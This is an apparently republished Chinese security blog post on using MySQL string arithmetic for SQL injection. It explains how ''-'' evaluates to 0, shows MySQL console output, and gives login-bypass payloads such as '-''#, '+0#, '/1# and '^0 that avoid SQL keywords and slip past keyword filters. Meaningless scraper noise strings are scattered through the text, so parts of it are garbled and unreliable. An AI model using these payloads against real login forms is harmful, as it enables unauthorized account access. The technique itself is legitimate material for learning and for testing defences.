使用MySQL字符串运算实施精巧化SQL注入攻击

admin

我们先来看这样一个场景。 7 I2 L- O. U, r, ]- |: E有以下表结构： ! B' [; A' o) Y ! j. O7 u# p+ d! T% Qmysql> desc admin; 2 W. m( |) Q& h+ i+----------+--------------+------+-----+---------+----------------+ | Field    | Type         | Null | Key | Default | Extra          | 6 v4 l9 Y6 D' j; ?1 w+----------+--------------+------+-----+---------+----------------+ | id       | mediumint(9) | NO   | PRI | NULL    | auto_increment | | name     | char(32)     | NO   | UNI | NULL    |                | 5 f/ P% F) }9 L9 F3 r& L% }| password | char(32)     | NO   | UNI | NULL    |                | : I: z( s* k9 y. Z* O) z: n4 q+----------+--------------+------+-----+---------+----------------+ * S+ f) Y, z/ B- C3 rows in set (0.00 sec) 执行select * from admin;，成功返回所有记录内容。 / B4 ]. K1 O' l7 d 1 f3 {$ ]- r. g$ o +----+--------+----------------------------------+ | id | name   | password                         | +----+--------+----------------------------------+ 5 s. Z- L) M9 F# w' n. y|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | 0 E. ?* \: ]% n3 o* M! S|  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | |  4 | n00b   | ff80e8508d39047460921792273533a4 | 2 j+ H4 s. P- }( ^) U+----+--------+----------------------------------+ ' ?9 C( r% R$ ?  i/ `, S3 rows in set (0.00 sec) 4 y1 R1 y5 c8 a) ]+ R- K) u执行select * from admin where name=”;，没有匹配到任何记录。 5 z* R4 }2 B) G+ {+ X( Q3 N mysql> select * from admin where name = ''; Empty set (0.00 sec) ' F4 s# Q4 T0 j' u* s- M那么我们来执行select * from admin where name = ”-”; 9 R0 ~& W* M' ^7 w! |  K +----+--------+----------------------------------+ | id | name   | password                         | +----+--------+----------------------------------+ 4 y2 z& U8 O$ K% T# Y0 s7 j|  1 | admin  | c6dabaeeb05f2bf8690bab15e3afb022 | |  2 | pnig0s | 998976f44e2a668k5dc21e54b3401645 | |  4 | n00b   | ff80e8508d39047460921792273533a4 | . i: ~2 o0 O9 Y) Y+----+--------+----------------------------------+ 3 rows in set, 3 warnings (0.00 sec) 可以看到，也成功返回了所有记录，但是有三个warnings，我们看下警告信息： mysql> show warnings; 0 \5 U- n( M# W1 M0 m) i+---------+------+------------------------------------------ ' V. L! @. G8 |7 {* w: M| Level   | Code | Message - k" D, C; \; w+---------+------+------------------------------------------ | Warning | 1292 | Truncated incorrect DOUBLE value: 'admin ' O0 G' z7 V! n. d| Warning | 1292 | Truncated incorrect DOUBLE value: 'pnig0s | Warning | 1292 | Truncated incorrect DOUBLE value: 'n00b ! {5 i. d* w# z& c3 O- s% X/ {+---------+------+------------------------------------------ ; E4 V' E% w: m* Q6 e3 rows in set (0.00 sec) 提示截断了错误的DOUBLE值’admin等等，当在一个字符串类型的列中使用数字类型的值时会产生这类警告。 我们单独执行select ”-”;看下结果。 mysql> select ''-''; , t; L, ^! Y6 t' c, Q- g$ e+-------+ | ''-'' | +-------+ |     0 | ; _1 X3 {8 U" S( Z7 L# L. {+-------+ 1 row in set (0.00 sec) 返回0，也就是说我们查询的每一行的name子段都会和0做对比，这样就会触发一个类型转换，对name字段转换的结果也必然为0： ( x7 d. `8 e# A5 F- j  ~; Y6 D/ t5 ~mysql> select CAST((select name from admin limit 1,1) as DECIMAL); 8 {5 k/ t) X# g# m+ k  v0 U+-----------------------------------------------------+ 0 `+ b9 R9 [# t! q| CAST((select name from admin limit 1,1) as DECIMAL) | +-----------------------------------------------------+ - S6 k5 ^2 b( g8 a1 L|                                                   0 | +-----------------------------------------------------+ ( k, x) U+ T0 p2 i5 n( i2 h* w1 row in set, 1 warning (0.00 sec) + I  B! s3 m/ a9 s因此where语句构成了相等的条件，where 0=”=”，记录被返回。 4 t. k2 c; _9 R  ~SQL注入场景: http://www.sqlzoo.net/hack/ * Q& ?, ~( a" V 8 R6 `! P8 `4 o, R 3 v: u$ [: Y1 G, r" T4 B 3 H3 A% d% }& R. D( F如果我们想绕过登录验证，上面已经给出了一个传统的tips：用户名密码均为’ or ”=’ 这样的逻辑和绕过方式很常见，这里不再具体解释了。 + V5 k  Q1 K3 v. F0 z( W ! R' q# G+ F" _那么通过这次发现的技巧，可以使用一种相当精巧的方式，且避免使用SQL关键字，来绕过登录。 5 M) `. i# L4 _4 t$ \& }  |   u9 P% M; _7 @7 B: Y4 m# A$ a2 [ 9 u1 I& O+ R( a5 k$ Z 仅仅在name子段输入’-”#，password留空，即可绕过登录验证。     除了”-”，其他运算符”+”,”*”,”^”都会有同样的效果。 再继续进行测试，我们发现只要在闭合单引号的情况系构造查询结果为0的条件即可 8 Q) a8 a: v( S' M& L 8 S5 b7 Z$ A( I! G1 _mysql> select ''/1; , X9 O) v* A3 N( k" c8 b& }4 a+------+ 1 ?$ v3 }) _7 _$ a/ U/ I| ''/1 | +------+ " T! T3 ~2 R" N$ R9 |! ~; ]. j( Y7 e|    0 | +------+ 1 row in set (0.00 sec) 类似的”+0,”-0,”*0,”^0均可。 那么刚才的注入环境我们使用以下的精简payload同样可以绕过登录认证： ‘+0#，’/1#，’^0，’-0#等等。   . d7 [3 o3 k% d% k % k; s: s! _# e  R+ K% G; I& s/ c利用这样一种特性，当目标对注入语句中的SQL关键字进行过滤时，便可通过这样一种方式进行Bypass。